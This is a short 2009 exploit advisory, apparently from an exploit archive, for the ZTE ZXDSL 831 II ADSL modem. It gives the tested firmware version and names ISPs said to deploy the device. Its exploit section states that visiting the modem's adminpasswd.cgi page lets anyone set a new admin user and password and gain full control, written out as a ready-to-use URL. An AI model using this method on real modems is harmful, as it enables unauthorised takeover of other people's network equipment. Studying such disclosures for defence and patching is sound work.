ZTE ZXDSL 831 II Modem Arbitrary Add Admin User Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ZTE ZXDSL 831 II Modem Arbitrary Add Admin User Vulnerability
# Published : 2009-08-18
# Author : SuNHouSe2
# Previous Title : Adobe JRun 4 (logfile) Directory Traversal Vulnerability (auth)
# Next Title : ProSysInfo TFTP Server TFTPDWIN 0.4.2 Remote BOF Exploit

-----------------------------------------------------
    -->> Found By  SuNHouSe2 [ALGERIAN HaCkEr] <<--
           --> Made in "Maghnia City" (DZ) <--
          --> Contact : sunhouse2@yahoo.com <--
        --> Greetz to : His0k4 all my friends <--
          --> Good Ramadan to all muslims <--
-----------------------------------------------------

Exploit tested on modem with this informations :

ZTE CORPORATION

Date             : NOV 2008
Product          : ADSL Modem
Model            : ZXDSL 831 II --> http://www.geeksecurity.org/tsttte.JPG
Firmware Version : ZXDSL 831IIV7.5.0a_E09_OV
 
-----------------------------------------------------
Introduction:

This modem is used by many providers in the world like 
russia india and algeria [used by provider and all clients of "Easy ADSL"].

Exploit :
We can change easily the user and password admin and get full access to the modem.

Go only here  and set new user and password:

http://192.168.1.1/adminpasswd.cgi

# www.Syue.com [2009-08-18]